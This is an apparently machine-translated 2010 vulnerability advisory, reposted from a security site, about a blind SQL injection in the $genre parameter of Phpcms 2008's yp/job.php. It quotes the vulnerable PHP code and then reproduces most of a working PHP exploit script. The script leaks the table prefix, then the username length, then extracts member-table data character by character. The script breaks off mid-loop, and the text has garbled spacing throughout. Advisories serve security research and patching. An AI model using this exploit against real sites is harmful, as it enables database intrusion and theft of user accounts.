Phpcms 2 0 0 8 yp/job. php script SQL blind injection vulnerability-vulnerability warning-the black bar safety net

2010-06-24T00:00:00
ID MYHACK58:62201027357
Type myhack58
Reporter 佚名
Modified 2010-06-24T00:00:00

Description

Affected version: Phpcms 2 0 0 8

Vulnerability description: Phpcms website management system is the domestic mainstream CMS systems

Phpcms the use of yp/job. php script to urldecode function does not properly filter user submitted$genre parameters in the SQL used in the query, a remote attacker can submit a malicious request to perform aSQL injectionattack. The following is a vulnerability of the PHP code fragment:

switch($action) { case 'list': $catid = intval($catid); $head['keywords'] .= 'List positions'; $head['title'] .= 'Job listings'.''.$ PHPCMS['sitename']; $head['description'] .= 'Job listings'.''.$ PHPCMS['sitename']; $templateid = 'job_list'; if($inputtime) $time = time() - 3 6 0 0$inputtime2 4; else $time = 0; if($time < 0 )$time = 0; $where = "j. updatetime >= '{$time}' "; $genre = urldecode($genre); if($station)$where .= "AND j. station = '{$station}' "; if($genre)$where .= "AND c. genre = '{$genre}' "; if(! trim($where))$where = '1'; break;<reference http://hi.baidu.com/netstart/blog/item/f891b1514a259112367abeb5.html > Test method: [www.sebug.net] This site provides program(method)may carry offensive,for security research and teaching purposes,at your own risk! <? ini_set("max_execution_time",0); error_reporting(7);

if ($argc != 4) usage ();

$hostname = $argv [1]; $path = $argv [2]; $userid = $argv [3]; $prefix="phpcms_"; //$key = "abcdefghijklmnopqrstuvwxyz0123456789"; $pos = 1; $chr = 0;

function usage () { global $argv; echo "\n[+] PhpCms 2 0 0 8 (job.php \$genre) Blind SQL Injection Exploit". "\n[+] Author: My5t3ry". "\n[+] Site : http://hi.baidu.com/netstart". "\n[+] Usage : php ".$ argv[0]." ". "\n[+] Ex. : php ".$ argv[0]." localhost /yp 1". "\n\n"; exit (); }

function request ($hostname, $path, $query) { $fp = fsockopen ($hostname, 8 0);

$request = "GET {$path}/job. php? action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n". "Host: {$hostname}\r\n". "Connection: Close\r\n\r\n";

fputs ($fp, $request);

while (! feof ($fp)) $reply .= fgets ($fp, 1 0 2 4);

fclose ($fp); return $reply; }

function exploit ($hostname, $path, $uid, $fld, $chr, $pos) { global $prefix;

$chr = ord ($chr);

$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$ prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";

$query = str_replace(" ", "%2 0", $query);

$query = str_replace("'", "%2 5 2 7", $query);

$outcode = request ($hostname, $path, $query);

preg_match ("/(.+)& lt; \/span>/", $outcode, $x);

if (strlen (trim ($x [1])) == 0) return false; else return true; }

$query = "x%2 5 2 7";

$outcode = request ($hostname, $path, $query);

preg_match('/FROM `(.+) yp_job/ie',$outcode,$match);

$prefix=$match[1];

//function lengthcolumns () //{ echo "\n--------------------------------------------------------------------------------\n"; echo "PhpCms 2 0 0 8 (job.php \$genre) Blind SQL Injection Exploit\n"; echo " By My5t3ry (http://hi.baidu.com/netstart)\n"; echo "\n--------------------------------------------------------------------------------\n"; echo "[~]trying to get pre...\n";

if ($match[1]) {

echo '[+]Good Job! Wo Got The pre -> '.$ match[1]."\ n"; }

else { die(" Exploit failed..."); }

echo "[~]trying to get username length...\n"; $exit=0; $length=0; $i=0; while ($exit==0) { $query = "x' OR length((select username from ".$ prefix."member Where userid='{$userid}'))=".$ i." OR '1'='2";

$query = str_replace(" ", "%2 0", $query);

$query = str_replace("'", "%2 5 2 7", $query);

$outcode = request ($hostname, $path, $query);

$i++;

preg_match ("/(.+)& lt; \/span>/", $outcode, $x); //echo $outcode; if ($i>2 0) {die(" Exploit failed...");}

if (strlen (trim ($x[1])) != 0) {

[1] [2] next